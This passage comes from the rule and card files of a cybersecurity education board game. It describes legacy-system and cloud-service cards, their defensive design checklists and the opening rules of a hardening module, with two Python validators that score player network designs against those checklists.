- Cannot use modern encryption (adds latency)
- Uses legacy protocols (Modbus, Profibus, DNP3 - no security built-in)
- Often air-gapped; now being connected to corporate network (exposes vulnerabilities)
- If compromised, physical safety implications (machinery malfunction, power outage, etc.)

Key Concerns (from ICS Perspective):
- Availability is paramount (security is secondary)
- Adding security controls might affect uptime
- ICS engineers don't understand IT security
- IT security tools and practices may break ICS
- ICS changes must be tested extensively (downtime is unacceptable)

Defense Strategy (Strict Isolation):
- Never Connect to Corporate Network: ICS should remain air-gapped
- If Connection Required: Use unidirectional gateway (ICS can send data out, nothing comes in)
- Network Segmentation: ICS in completely isolated segment from corporate systems
- No User Internet Access from ICS: ICS workstations cannot browse internet
- Physical Security: ICS room locked, access restricted to authorized engineers
- Monitoring: Use ICS-specific monitoring tools (not traditional SIEM)
- Assumption: Assume ICS network will be compromised; focus on preventing spread to corporate

Network Interactions:
- Isolation: Complete separation from corporate network (air-gapped preferred)
- If Bridge Required: Unidirectional gateway (one-way data flow)
- Incompatible with: Corporate firewall (ICS cannot tolerate intrusion detection latency)
- Incompatible with: EDR/Antivirus (would slow down real-time control)
- Incompatible with: Cloud integration (real-time latency requirements)

Incident Response Impact:
- ICS compromise may cause physical safety issues (priority = physical safety over data)
- ICS compromise may cause production shutdown (significant financial impact)
- ICS security investigation requires specialized expertise (not standard IT)
- ICS forensics may disrupt operations (cannot preserve evidence if it affects safety)

Team Design Validation:
- ✓ If including ICS: must isolate ICS from corporate network
- ✓ Must use unidirectional gateway if connectivity required
- ✓ Must NOT install traditional IT security tools on ICS
- ✗ Failure: Corporate network connected to ICS without isolation
- ✗ Failure: ICS exposed to internet or untrusted networks
- ✗ Failure: IT security tools degrading ICS real-time performance
**LEGACY-04: Obsolete OS**
- Type: Legacy Infrastructure Running Unsupported OS
- Cost: 5 Budget (cheap hardware, but difficult to support)
- Complexity: 3/4 (difficult to manage with modern security tools)
- Availability Requirement: 80-95% (business can tolerate occasional downtime)
- Operating System Examples: Windows XP, Windows Server 2003, old Linux kernels, custom UNIX variants

Description: Systems running operating systems that are no longer supported by the vendor or open-source community. The vendor has stopped releasing security patches. Public exploit code for known vulnerabilities exists and is freely available.

Examples:
- Windows XP (support ended 2014)
- Windows Server 2003 (support ended 2015)
- Linux 2.4/2.6 kernels (EOL for 10+ years)
- Solaris 8/9 (Sun Microsystems EOL)
- Other commercial UNIX variants EOL decades ago

Key Characteristics:
- Support: No security patches from vendor
- Exploits: All known vulnerabilities are published (no zero-days)
- Tools: Modern security tools often don't run on EOL OS
- Compatibility: Cannot run modern applications
- Patching OS: OS upgrade would break dependent applications
- Cost of Replacement: Application replacement cost makes OS upgrade prohibitive

Key Concerns:
- All known vulnerabilities can be exploited (no patches)
- Public exploits readily available (trivial for attacker)
- Modern malware often targets these systems (profitable attacks)
- Ransomware frequently targets EOL systems (known vulnerabilities)
- System cannot run modern antivirus/EDR (not compatible)
- System cannot use modern encryption protocols
- System is prone to exploitation for lateral movement into modern systems

Defense Strategy (Assume Compromise, Isolate):
- Assumption: Assume EOL system will be compromised (all vulnerabilities are public)
- Network Isolation: EOL system in restricted segment, minimal connectivity
- Firewall Rules: Only necessary traffic to/from EOL system
- No Lateral Movement: Firewall rules prevent movement from EOL system to others
- No Sensitive Data: Do not store sensitive data on EOL system
- Monitoring: SIEM monitors EOL system closely (detect compromise signs)
- Replacement Planning: Have timeline to replace/upgrade EOL system
- Physical Security: Restrict physical access to EOL system

Network Interactions:
- Isolation: EOL system in isolated segment
- Firewall: Strict firewall rules (default deny)
- Monitoring: SIEM alerts on any unusual EOL system activity
- No Cloud Access: EOL system does not connect to cloud systems
- Air-gapped Preferred: If possible, keep EOL system air-gapped

Incident Response Impact:
- EOL system compromise may be inevitable (all vulnerabilities public)
- Attacker will target EOL system as entry point (easier than hardened systems)
- EOL system may be used as staging point for attacks on hardened systems
- Forensics on EOL system may be difficult (no modern forensics tools support it)

Team Design Validation:
- ✓ If including EOL system: must isolate completely
- ✓ Must have replacement timeline
- ✓ Must NOT store sensitive data on EOL system
- ✗ Failure: No network isolation for EOL system
- ✗ Failure: Sensitive data on EOL system
- ✗ Failure: EOL system has same network privileges as modern systems
| Card | System Type | Cost | Complexity | Key Challenge |
|---|---|---|---|---|
| LEGACY-01 | Mainframe | 15 | 4/4 | Cannot patch, mission-critical |
| LEGACY-02 | Custom Application | 8 | 3/4 | Vendor no longer exists |
| LEGACY-03 | Industrial Control | 12 | 4/4 | Real-time + safety-critical |
| LEGACY-04 | Obsolete OS | 5 | 3/4 | All vulnerabilities public |
Key Principle: Cannot Fix, Must Isolate
Legacy systems cannot be fixed through normal security controls:
- Cannot patch (vendor no longer supports)
- Cannot upgrade OS (breaks dependent applications)
- Cannot install modern security tools (incompatible)
- Cannot redesign (cost prohibitive)

Instead, organizations must:
1. Isolate the legacy system: Separate network segment, strict firewall rules
2. Monitor closely: SIEM alerts on any anomalous activity
3. Assume compromise: Design defenses assuming legacy system will be compromised
4. Plan replacement: Have timeline to eventually replace legacy system
5. Limit exposure: Do not connect sensitive systems to legacy system network
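The five steps above and the Team Design Validation rows on LEGACY-01..04 can be checked mechanically. The validator below is an added example, not part of the Incident Zero rules: it takes a network design and returns the ✗ failures the cards describe. The LegacyDesign model (segments plus allowed flows) and the names "Corporate", "Internet", "Users", "Any" and "Cloud" are this example's own assumptions.

```python
"""Design validator for the Legacy System expansion cards (added example, not
part of the Incident Zero rules). Turns the Team Design Validation checks on
LEGACY-01..04 into code. The LegacyDesign model (segments, allowed flows) and
names such as "Corporate", "Internet", "Users", "Any" and "Cloud" are this
example's own assumptions."""
from dataclasses import dataclass, field

@dataclass
class LegacyDesign:
    components: set                 # deployed cards/components by name
    segment: dict                   # component -> network segment it sits in
    flows: set                      # allowed (source, destination) connections
    sensitive_data_on: set = field(default_factory=set)
    replacement_plan: set = field(default_factory=set)  # legacy systems with a timeline
    it_tools_on: set = field(default_factory=set)       # hosts with EDR/AV/IDS agents

    def inbound(self, name):
        return {s for s, d in self.flows if d == name}
    def outbound(self, name):
        return {d for s, d in self.flows if s == name}
    def neighbours(self, name):     # other components in the same segment
        seg = self.segment.get(name)
        return {c for c, s in self.segment.items() if s == seg and c != name}

def validate(d):
    """Return a list of validation failures (empty list = design passes)."""
    f = []
    legacy = sorted(c for c in d.components if c.startswith("LEGACY-"))
    for c in legacy:                # Key Principle: every legacy card needs isolation + SIEM
        if "Internet" in d.inbound(c):
            f.append(f"{c}: exposed to the internet")
        if d.segment.get(c, "Corporate") == "Corporate":
            f.append(f"{c}: not in a restricted network segment")
        if "SIEM" not in d.components:
            f.append(f"{c}: no SIEM monitoring access")
    if "LEGACY-01" in legacy:       # Mainframe
        for need in ("Network Segmentation Switch", "Firewall"):
            if need not in d.components:
                f.append(f"LEGACY-01: missing {need}")
        if "Users" in d.inbound("LEGACY-01"):
            f.append("LEGACY-01: direct user access (should go via an application tier)")
        if "Cloud" in d.inbound("LEGACY-01") | d.outbound("LEGACY-01"):
            f.append("LEGACY-01: cloud connectivity crosses the security boundary")
    if "LEGACY-02" in legacy:       # Custom Application: app + its database isolated
        if d.segment.get("LEGACY-02 DB", "Corporate") == "Corporate":
            f.append("LEGACY-02: application database not isolated")
        others = d.inbound("LEGACY-02 DB") - {"LEGACY-02"}
        if others:
            f.append("LEGACY-02: database reachable from " + ", ".join(sorted(others)))
        if "Any" in d.inbound("LEGACY-02"):
            f.append("LEGACY-02: unrestricted user access to the application")
    if "LEGACY-03" in legacy:       # Industrial Control: one-way out, nothing in
        if d.inbound("LEGACY-03"):
            f.append("LEGACY-03: corporate network connected into ICS without isolation")
        if d.outbound("LEGACY-03") - {"Unidirectional Gateway"}:
            f.append("LEGACY-03: ICS data leaves without a unidirectional gateway")
        if "LEGACY-03" in d.it_tools_on:
            f.append("LEGACY-03: IT security tools installed on ICS")
    if "LEGACY-04" in legacy:       # Obsolete OS
        if d.neighbours("LEGACY-04"):
            f.append("LEGACY-04: shares a segment with " + ", ".join(sorted(d.neighbours("LEGACY-04"))))
        if "LEGACY-04" not in d.replacement_plan:
            f.append("LEGACY-04: no replacement timeline")
        if "LEGACY-04" in d.sensitive_data_on:
            f.append("LEGACY-04: sensitive data stored on EOL system")
        if "Cloud" in d.outbound("LEGACY-04"):
            f.append("LEGACY-04: EOL system connects to cloud systems")
    return f

# Constructed designs: one that breaks most of the rules, one that follows the cards.
def risky_design():
    return LegacyDesign(
        components={"LEGACY-01", "LEGACY-04", "Firewall", "SIEM"},
        segment={"LEGACY-01": "Corporate", "LEGACY-04": "Corporate"},
        flows={("Users", "LEGACY-01"), ("LEGACY-01", "Cloud"), ("Internet", "LEGACY-04")},
        sensitive_data_on={"LEGACY-04"})

def isolated_design():
    return LegacyDesign(
        components={"LEGACY-01", "LEGACY-03", "Firewall", "Network Segmentation Switch",
                    "SIEM", "App Tier", "Unidirectional Gateway"},
        segment={"LEGACY-01": "Mainframe Zone", "LEGACY-03": "OT Zone", "App Tier": "Corporate"},
        flows={("App Tier", "LEGACY-01"), ("LEGACY-03", "Unidirectional Gateway"),
               ("Unidirectional Gateway", "SIEM")})
```

`validate(isolated_design())` returns an empty list; `validate(risky_design())` returns nine findings, including the missing Network Segmentation Switch, the direct user path into the mainframe and the sensitive data on the EOL host.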
Including legacy systems significantly increases network design complexity:
- Must add firewall rules for each legacy system
- Must add network segmentation
- Must add SIEM monitoring
- Budget is constrained (legacy systems are expensive to operate)

If Incident Response follows Network Building:
- Legacy systems are easier attack targets (known vulnerabilities)
- Attacker will likely compromise legacy system first
- Legacy system compromise may lead to lateral movement
- Legacy system may lack proper logging (forensics is difficult)

Teams face a strategic decision: include legacy systems or avoid them?
- Include Legacy Systems: Realistic, mirrors real organizations, adds challenge
- Avoid Legacy Systems: Simpler network design, but unrealistic
- Team Decision: Should reflect the organization's actual legacy system situation

Additional Legacy System Cards:
- LEGACY-05: Mainframe Tape Backup System (disaster recovery, retention archiving)
- LEGACY-06: Proprietary Database System (custom data storage, vendor extinct)
- LEGACY-07: Dedicated PBX Telephony System (VoIP not yet viable)
- LEGACY-08: Custom SCADA System (industrial automation, not standard ICS)
Network Building Module: Legacy Systems (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.1 - Balanced & Refined Edition
cards/network-building/expansion-deck/cloud-variants.md
Version: 2.1 - Balanced & Refined Edition Last Updated: October 2025
Cloud Variant Cards extend the Network Building module with advanced cloud deployment options and cloud-native technologies beyond the basic Cloud Workload card in the core deck.
- Type: Cloud-Native Architecture
- Cost: 6 Budget (container orchestration platform)
- Complexity: 3/4 (requires Kubernetes expertise)
- Supported Platforms: AWS ECS, Azure Container Instances, Google Cloud Run, Kubernetes
- Application Type: Modern cloud-native applications built as multiple small services

Description: Applications broken into microservices running in containers (Docker). Each service is a separate container that can scale independently. Containers are orchestrated by a platform (Kubernetes, Docker Swarm, ECS).

Key Characteristics:
- Services: Application broken into small, focused services
- Containers: Each service runs in a container (isolated environment)
- Orchestration: Platform automatically manages container deployment, scaling, and recovery
- Scalability: Each service can scale independently based on demand
- DevOps: Infrastructure and code are tightly integrated (Infrastructure as Code)
- Cloud-Native: Built for cloud (ephemeral resources, auto-scaling, auto-healing)

Key Advantages:
- Scalability: Auto-scale individual services based on load
- Resilience: Container failure doesn't affect entire application
- Efficiency: Containers share OS kernel (more efficient than VMs)
- Velocity: Deploy microservices independently (faster development)
- Cost: Pay only for resources used (serverless principles)

Key Concerns (Security Perspective):
- Complexity: Many moving parts, many potential attack surfaces
- Container Escape: Attacker in one container might escape to host
- Supply Chain: Container images come from registries (may be compromised)
- Secrets Management: Container needs credentials/API keys (risk of exposure)
- Lateral Movement: Multiple containers in same cluster; network policies must isolate them
- Compliance: Tracing data across microservices is complicated
- Logging: Distributed across many containers (aggregation required)

Defense Strategy:
- Container Runtime Security: Monitor and restrict container behavior (Falco, Sysdig)
- Image Scanning: Scan images for vulnerabilities before deployment
- Network Policies: Kubernetes network policies restrict inter-service communication
- Pod Security Policies: Restrict what containers can do (no privilege escalation)
- Registry Security: Scan images in registry, require signing
- Secrets Vault: Use HashiCorp Vault or cloud-native secrets (not environment variables)
- SIEM Integration: Aggregate logs from all containers

Network Interactions:
- Works with: Cloud-native architecture (ARCH-05)
- Requires: Container orchestration platform (Kubernetes)
- Requires: Container registry (Docker Hub, ECR, ACR, GCR)
- Requires: Secrets management (HashiCorp Vault, AWS Secrets Manager)
- Integrates with: Microservices architecture (multiple services)

Incident Response Impact:
- Container compromise may be isolated (if network policies work)
- Container escape would give attacker access to host
- Supply chain attack on container images affects all deployments
- Distributed nature makes forensics complex
- Log aggregation essential for investigation

Team Design Validation:
- ✓ If including microservices: must include container runtime security
- ✓ Must include image scanning + signing
- ✓ Must include network policies
- ✓ Must include secrets management
- ✗ Failure: Hardcoded secrets in containers
- ✗ Failure: No image signing/scanning
- ✗ Failure: No container network policies
- Type: Cloud-Native Compute (Abstracted Infrastructure)
- Cost: 3 Budget (minimal infrastructure management)
- Complexity: 2/4 (simple from ops perspective, but different security model)
- Supported Platforms: AWS Lambda, Azure Functions, Google Cloud Functions, IBM Cloud Functions
- Use Cases: Event-driven processing, API backends, scheduled jobs, data transformation

Description: Functions deployed to a serverless platform. You write code; the platform handles scaling, infrastructure, and execution. You pay only for actual execution time (milliseconds).

Key Characteristics:
- No Infrastructure: You don't manage servers/containers/VMs
- Event-Driven: Functions triggered by events (API call, message queue, schedule, etc.)
- Auto-Scaling: Automatically scales from zero to thousands of concurrent executions
- Stateless: Functions should not maintain state (state in database/message queue)
- Time-Limited: Function has timeout (usually 15 minutes max)
- Cost Model: Pay per execution millisecond (very cheap if infrequently called)

Key Advantages:
- Simplicity: Write code, deploy, done (no servers to manage)
- Cost: Pay only for execution time (not for idle servers)
- Scalability: Automatic scaling without configuration
- Velocity: Rapid deployment cycle (seconds)
- Reduced Attack Surface: No server to compromise (provider manages infrastructure)

Key Concerns (Security Perspective):
- Dependency Management: Function depends on libraries (vulnerable packages)
- Secrets in Environment Variables: Function needs credentials (hardcoded or env vars)
- Supply Chain: Libraries may be compromised (dependency attack)
- Monitoring Blind Spot: Functions are ephemeral (logs must be aggregated)
- Cold Start Attacks: Function startup time can leak information
- Privilege Escalation: Function may have overly broad IAM permissions
- Denial of Service: Function can be invoked repeatedly (cost/resource attack)
- Compliance: Difficult to audit function execution (multi-tenant platform)

Defense Strategy:
- Dependency Scanning: Scan dependencies for vulnerabilities
- Secrets Management: Use cloud secrets manager (not environment variables)
- IAM Least Privilege: Function has minimum required permissions
- CloudTrail Logging: Log all function invocations
- VPC Integration: Function connects to VPC if accessing private resources
- Rate Limiting: Prevent function invocation DoS
- Input Validation: Strict validation of all inputs (injection attacks)
- Library Pinning: Pin exact library versions (prevent supply chain attacks)

Network Interactions:
- Works with: Cloud-first architecture (ARCH-05)
- Integrates with: API Gateway (exposes function as HTTP endpoint)
- Integrates with: Message Queues (event-driven triggers)
- Requires: Secrets Manager (for credentials)
- Optional: VPC integration for private resource access

Incident Response Impact:
- Function compromise is possible (code vulnerability or dependency)
- Function invocation logs are critical (only audit trail)
- Multi-tenant platform may complicate forensics
- Dependency vulnerability affects all functions using vulnerable library
- Distributed nature makes understanding attack chain difficult

Team Design Validation:
- ✓ If including serverless: must include secrets management
- ✓ Must include dependency scanning
- ✓ Must include IAM least privilege configuration
- ✗ Failure: Secrets in environment variables
- ✗ Failure: Overly broad function permissions
- ✗ Failure: No input validation
Type: Cloud-Managed Data Layer
Cost: 5 Budget (pay per GB + IO operations)
Complexity: 1/4 (cloud provider manages infrastructure)
Supported Platforms: AWS RDS, Azure SQL Database, Google Cloud SQL, MongoDB Atlas, DynamoDB
Database Types: Relational (SQL Server, PostgreSQL, MySQL, Oracle), NoSQL (MongoDB, DynamoDB, Cassandra)

Description: Database managed entirely by cloud provider. You provision database capacity, cloud provider handles: backups, patching, failover, replication, encryption, monitoring.

Key Characteristics:
- Managed: Cloud provider manages infrastructure (patches, backups, upgrades)
- Automated Backup: Point-in-time recovery (no manual backup configuration)
- Replication: Automatic geo-replication for disaster recovery
- Encryption: Encryption at rest and in transit (built-in)
- Scaling: Can scale storage and compute without downtime
- Monitoring: Built-in monitoring and alerting
- Compliance: Provider maintains compliance certifications (SOC 2, HIPAA, PCI-DSS)

Key Advantages:
- Reliability: Provider manages availability (99.99% SLA typical)
- Security: Provider manages patching and security updates
- Compliance: Provider handles compliance certifications
- Cost: No ops team needed to maintain database
- Disaster Recovery: Automated backups and geo-replication
- Scalability: Transparent scaling without downtime

Key Concerns (Security Perspective):
- IAM Configuration: Database access via IAM roles (misconfiguration exposes data)
- Network Exposure: Database may be internet-accessible (must restrict)
- Encryption Keys: Cloud provider manages keys (limited control)
- Audit Logging: Must enable audit logging (not always on by default)
- Data Residency: Where is data stored geographically?
- Backup Security: Backups must be encrypted and access-controlled
- Supply Chain: Vendor is now part of attack surface
- Multi-Tenant: Data may share hardware with other customers (trust model)

Defense Strategy:
- Network Isolation: Database accessible only from application (not internet)
- IAM Least Privilege: Only application has access (not human users)
- Encryption Keys: Use customer-managed keys (not provider-managed)
- Audit Logging: Enable all audit logging (schema changes, access, queries)
- Monitoring: Set up alerting on suspicious queries (large exports, drops, etc.)
- Backup Encryption: Verify backups are encrypted
- Access Control: Disable public IP, use private endpoints only
- Secrets Management: Database credentials in secrets vault (not hardcoded)

Network Interactions:
- Works with: Cloud-first architecture (ARCH-05) or Cloud Hybrid (ARCH-04)
- Integrates with: Application tier (via private endpoint)
- Requires: Secrets management (for credentials)
- Incompatible with: On-premises applications (latency/connectivity issues)

Incident Response Impact:
- Database compromise likely primary attack goal (most valuable data)
- Cloud provider manages baseline security (shifts responsibility model)
- Audit logs are critical evidence (may be only forensics available)
- Backup verification essential (can you restore to pre-attack state?)
- Multi-tenant concerns for sensitive investigations

Team Design Validation:
- ✓ If including managed database: must use private endpoints (not public)
- ✓ Must enable audit logging
- ✓ Must use customer-managed encryption keys
- ✓ Must restrict database IAM permissions
- ✗ Failure: Database public IP exposed to internet
- ✗ Failure: Overly broad IAM permissions (anyone can access)
- ✗ Failure: Audit logging disabled
Type: Edge Computing / Performance Enhancement
Cost: 4 Budget (pay per GB transferred + requests)
Complexity: 2/4 (configuration required, but well-documented)
Supported Platforms: CloudFlare, AWS CloudFront, Azure CDN, Google Cloud CDN, Akamai
Use Cases: Static assets (images, JS, CSS), web application acceleration, DDoS mitigation

Description: CDN caches content across globally distributed edge servers. When users request content, they get it from the nearest edge server (fast). Reduces load on origin server and improves user experience.

Key Characteristics:
- Distributed Caching: Content cached at 100+ edge locations worldwide
- Fast Delivery: Users get content from nearest edge (milliseconds)
- Origin Protection: Origin server behind CDN (hides IP, reduces load)
- DDoS Protection: CDN absorbs DDoS attacks before reaching origin
- SSL/TLS Termination: CDN handles encryption (origin can use HTTP)
- Rate Limiting: Can rate-limit requests per IP
- Security Headers: Can inject security headers (HSTS, CSP, etc.)

Key Advantages:
- Performance: Content delivery 100x faster globally
- DDoS Protection: Built-in DDoS mitigation
- Security: Origin IP hidden, security scanning at edge
- Cost Efficiency: Reduces origin server bandwidth costs
- Geo-Location: Can route users to different content based on location

Key Concerns (Security Perspective):
- Cache Poisoning: Attacker poisons CDN cache with malicious content
- Origin Bypass: Attacker finds origin IP, bypasses CDN security
- SSL Stripping: CDN can decrypt traffic (must trust CDN provider)
- Cookie Security: Sensitive cookies may be cached (GDPR/privacy issue)
- Personalization: Cached content loses personalization (may expose user data)
- Configuration Mistakes: Wrong cache settings may cache sensitive content
- Origin Protection: Still need to protect origin server (CDN is not complete solution)
- Bot Attack: Attackers can still target origin through CDN

Defense Strategy:
- Cache Settings: Do not cache sensitive content (set cache headers)
- Origin Protection: Implement Web Application Firewall (WAF) on origin
- Rate Limiting: Configure CDN rate limiting rules
- DDoS Settings: Enable DDoS protection features
- SSL Validation: Verify SSL certificates (prevent MITM)
- Geoblocking: Block traffic from unwanted regions (geo-restrictions)
- Security Headers: Implement security headers (HSTS, CSP, X-Frame-Options)
- Origin IP Hiding: Use origin concealment (hide real IP)
- Monitoring: Monitor for suspicious CDN patterns

Network Interactions:
- Works with: Web application (static assets + dynamic content)
- Works with: Cloud Hybrid (ARCH-04) or Cloud First (ARCH-05)
- Complements: Web Application Firewall (WAF)
- Optional with: Infrastructure (performance enhancement, not required)

Incident Response Impact:
- CDN compromise could distribute malware to all users (supply chain attack)
- Cache poisoning affects entire user base
- Origin IP exposure could enable direct attacks on origin server
- CDN logs are evidence (attacker activity visible in CDN analytics)
- DDoS attack visibility (CDN shows attack patterns)

Team Design Validation:
- ✓ If including CDN: must configure cache headers correctly
- ✓ Must enable security features (DDoS, WAF, rate limiting)
- ✓ Should hide origin IP
- ✗ Failure: Caching sensitive/personalized content
- ✗ Failure: Disabled security features
- ✗ Failure: Origin IP exposed
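The Team Design Validation checklists for the Serverless, Managed Database and CDN cards, as an added runnable checker (example code written for this page, not part of the game's materials). The design setting names (secrets_source, iam_scope, caches_sensitive_content, and so on) are assumptions chosen to mirror the checklist wording; the ✓/✗ texts come from the cards above.

```python
"""Team Design Validation checker for the CLOUD-02 Serverless, CLOUD-03 Managed
Database and CLOUD-04 CDN cards. Added example for this page, not the game's own
code. Setting names (secrets_source, iam_scope, ...) are assumptions chosen to
mirror the checklist wording on the cards."""
from dataclasses import dataclass, field


@dataclass
class ValidationResult:
    passed: list = field(default_factory=list)
    failures: list = field(default_factory=list)

    @property
    def ok(self) -> bool:
        return not self.failures


def _check(result, condition, card, requirement, failure):
    """Record one satisfied requirement or one failure, prefixed with the card id."""
    if condition:
        result.passed.append(f"{card}: {requirement}")
    else:
        result.failures.append(f"{card}: {failure}")


def validate_serverless(cfg, result):
    """CLOUD-02: secrets management, dependency scanning, IAM least privilege, input validation."""
    _check(result, cfg.get("secrets_source") == "secrets_manager", "CLOUD-02",
           "secrets management in use", "Secrets in environment variables")
    _check(result, cfg.get("dependency_scanning") is True, "CLOUD-02",
           "dependency scanning in use", "No dependency scanning")
    _check(result, cfg.get("iam_scope") == "least_privilege", "CLOUD-02",
           "IAM least privilege configured", "Overly broad function permissions")
    _check(result, cfg.get("input_validation") is True, "CLOUD-02",
           "input validation in place", "No input validation")


def validate_managed_db(cfg, result):
    """CLOUD-03: private endpoints, audit logging, customer-managed keys, restricted IAM."""
    _check(result, cfg.get("public_ip") is False, "CLOUD-03",
           "private endpoints only", "Database public IP exposed to internet")
    _check(result, cfg.get("audit_logging") is True, "CLOUD-03",
           "audit logging enabled", "Audit logging disabled")
    _check(result, cfg.get("encryption_keys") == "customer_managed", "CLOUD-03",
           "customer-managed encryption keys", "Customer-managed encryption keys not used")
    _check(result, cfg.get("iam_scope") == "application_only", "CLOUD-03",
           "database IAM restricted to the application",
           "Overly broad IAM permissions (anyone can access)")


def validate_cdn(cfg, result):
    """CLOUD-04: correct cache headers, security features enabled, origin IP hidden."""
    _check(result, cfg.get("caches_sensitive_content") is False, "CLOUD-04",
           "cache headers exclude sensitive/personalized content",
           "Caching sensitive/personalized content")
    enabled = set(cfg.get("security_features", []))
    _check(result, {"ddos", "waf", "rate_limiting"} <= enabled, "CLOUD-04",
           "DDoS, WAF and rate limiting enabled", "Disabled security features")
    _check(result, cfg.get("origin_ip_hidden") is True, "CLOUD-04",
           "origin IP hidden", "Origin IP exposed")


VALIDATORS = {"CLOUD-02": validate_serverless,
              "CLOUD-03": validate_managed_db,
              "CLOUD-04": validate_cdn}


def validate_design(design):
    """Run the checklist for every cloud card present in the design.
    Cards the team did not include are skipped ("If including ...")."""
    result = ValidationResult()
    for card, cfg in design.items():
        validator = VALIDATORS.get(card)
        if validator is not None:
            validator(cfg, result)
    return result


# Constructed sample designs (not from the game's materials).
WEAK_DESIGN = {
    "CLOUD-02": {"secrets_source": "env_vars", "dependency_scanning": True,
                 "iam_scope": "admin", "input_validation": True},
    "CLOUD-03": {"public_ip": True, "audit_logging": False,
                 "encryption_keys": "provider_managed", "iam_scope": "any_user"},
}
HARDENED_DESIGN = {
    "CLOUD-02": {"secrets_source": "secrets_manager", "dependency_scanning": True,
                 "iam_scope": "least_privilege", "input_validation": True},
    "CLOUD-03": {"public_ip": False, "audit_logging": True,
                 "encryption_keys": "customer_managed", "iam_scope": "application_only"},
    "CLOUD-04": {"caches_sensitive_content": False,
                 "security_features": ["ddos", "waf", "rate_limiting"],
                 "origin_ip_hidden": True},
}

if __name__ == "__main__":
    for name, design in (("weak", WEAK_DESIGN), ("hardened", HARDENED_DESIGN)):
        r = validate_design(design)
        print(f"{name}: {'PASS' if r.ok else 'FAIL'}")
        for f in r.failures:
            print("  ✗", f)
```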
| Card | Technology | Cost | Complexity | Primary Benefit |
|---|---|---|---|---|
| CLOUD-01 | Microservices | 6 | 3/4 | Scalability & Velocity |
| CLOUD-02 | Serverless | 3 | 2/4 | Simplicity & Cost |
| CLOUD-03 | Managed DB | 5 | 1/4 | Reliability & Compliance |
| CLOUD-04 | CDN | 4 | 2/4 | Performance & DDoS Protection |
Key Principle: Different Cloud Services, Different Security Models
Each cloud variant represents different architectural choices:
- Microservices: Scalability + complexity (many attack surfaces)
- Serverless: Simplicity + different threat model (function-level security)
- Managed Database: Reliability + shared responsibility (provider + customer)
- CDN: Performance + edge computing (distributed security)

Organizations use combinations of these services:
- Serverless functions backed by managed database (simple, scalable, reliable)
- Microservices deployed globally via CDN (scalable, fast, available)
- Mix of serverless and containers (different workloads, different approaches)

Cloud variants add flexibility to network design:
- Can build entirely on serverless (very simple, minimal infrastructure)
- Can mix serverless + containers (different workloads)
- Can add CDN for global distribution
- Can use managed database for all data needs

Cloud variants have different cost models:
- Serverless: Cheap if used occasionally, expensive if always running
- Microservices: Scale-to-zero not available (always running cost)
- Managed Database: Scale with usage (can get expensive)
- CDN: Cheap for low traffic, expensive for high traffic

Cloud variants trade operational complexity for different concerns:
- Serverless: No ops burden, but security mindset different
- Microservices: Ops burden (Kubernetes), but powerful scalability
- Managed Database: No ops burden, but IAM misconfiguration risk
- CDN: Config once, then mostly set-and-forget

Additional Cloud Variant Cards:
- CLOUD-05: Machine Learning Platform (ML training/inference)
- CLOUD-06: Event Streaming (Kafka, pub/sub architectures)
- CLOUD-07: Search & Analytics (Elasticsearch, BigQuery)
- CLOUD-08: API Gateway (API management and rate limiting)
- CLOUD-09: Message Queue (async processing, event-driven)
- CLOUD-10: Infrastructure as Code Platform (automated deployment)
Network Building Module: Cloud Variants (Expansion)
Part of Incident Zero, a modular cybersecurity board game · v2.1 - Balanced & Refined Edition
docs/rules/module-hardening.md
Version: 2.2 - Playtest Edition
Module Duration: 20-45 minutes (standalone or after Incident Response)
Prerequisites: None (can play standalone) or completion of Incident Response module
Learning Focus: Defense-in-depth, security architecture, proactive hardening, layered controls
The Hardening Module teaches players how to build multi-layered security controls that work together to protect critical systems. Players transition from reactive incident response to proactive security design.
This module can be:
- Standalone: Play alone with generated threat context
- Continuation: Follow a successful Incident Response (players harden against discovered threats)
- Paired: Combined with other modules for complete security lifecycle training
| Aspect | Incident Response | Hardening |
|---|---|---|
| Focus | Detect hidden threats | Build defenses against known threats |
| Time Pressure | High (variable turn limit, 100 budget) | Lower (7 turns, carries budget forward) |
| Actions | Investigate, Deploy, Emergency Response | Deploy, Upgrade, Playbook, Test |
| Rolls Needed | Investigation & Defense deployments | Test & Drill and Pentester defense rolls |
| Scoring | Detection efficiency | Defense layering & breadth |
| Threats | Hidden chain | Known vectors, Pentester tactics |
Generate threat context from scratch (v2.2 — one standard procedure):
- Roll 1d6 for each of the six threat vectors (SOCIAL_ENGINEERING, WEB_EXPLOIT, CREDENTIAL_ABUSE, MALWARE, NETWORK, DATA_EXFIL):
  - 1-2: No notable threat on this vector
  - 3-4: Intermediate threat on this vector
  - 5-6: Advanced threat on this vector
- Or use Threat Orchestrator's chosen scenario
- Budget: 150 (full planning allocation)

Use the attack chain that was just discovered:
- All revealed threat cards now represent known attack vectors
- Each vector gets a defense priority
- Budget carries over (minimum 20, maximum 150)
- Example: If IR revealed Phishing, Lateral Movement, and Data Exfil, you harden against those specific vectors
Threat Orchestrator describes a realistic scenario:
"Imagine your team successfully detected an attack chain:
1. Phishing campaign (SOCIAL ENGINEERING vector)
2. Lateral movement via SMB (NETWORK vector)
3. Data exfiltration (DATA EXFIL vector)
You have time to harden your network. Here are the threat vectors you need to defend against..."
See: cards/hardening/core-deck/defense-cards.md, cards/hardening/core-deck/pentester-tactic-cards.md, cards/network-building/core-deck/asset-cards.md

Each Blue Team receives 5 Defense Cards (drawn randomly, face down in hand)
Threat Orchestrator provides context for the hardening scenario:
"Your detection team successfully identified an attack chain. Now you have time and resources to harden your defenses to prevent similar attacks in the future. Here's what you're defending against and what assets are at risk..."
The Hardening module runs 7 turns at every difficulty level (v2.2 — difficulty scales through the number of Pentester Tactics, not the turn count). One action per turn.
START OF TURN
- Announce turn number: "Hardening Turn 3..."
- Announce remaining Budget
- Declare any Pentester Challenge scheduled for this turn

PLANNING PHASE (2-3 minutes)
- Team discusses hardening strategy
- Decides which action to take this turn
- Prepares for any mid-turn Pentester Challenge

ACTION PHASE
- Execute chosen action (see below)
- Resolve rolls if applicable
- Update trackers

END OF TURN
- Advance turn counter
- Draw 1 new Defense Card
- Check if Pentester Challenge occurs (typically turn 3-4)
Cost: 10/15/25 Budget (based on card tier)
Roll Required: None—automatic success

How it works:
1. Choose a Defense Card from your hand
2. Announce which Asset or threat vector it protects
3. Place card on the table (face up)
4. Optional: Explain the deployment strategy (enhances learning but not required)

Effect:
- Defense is immediately active and deployed
- Counts toward Security Score (5 points per defense)
- Cannot be undone (represents permanent security improvement)
- Stays on board for remainder of module and beyond (if continuing)

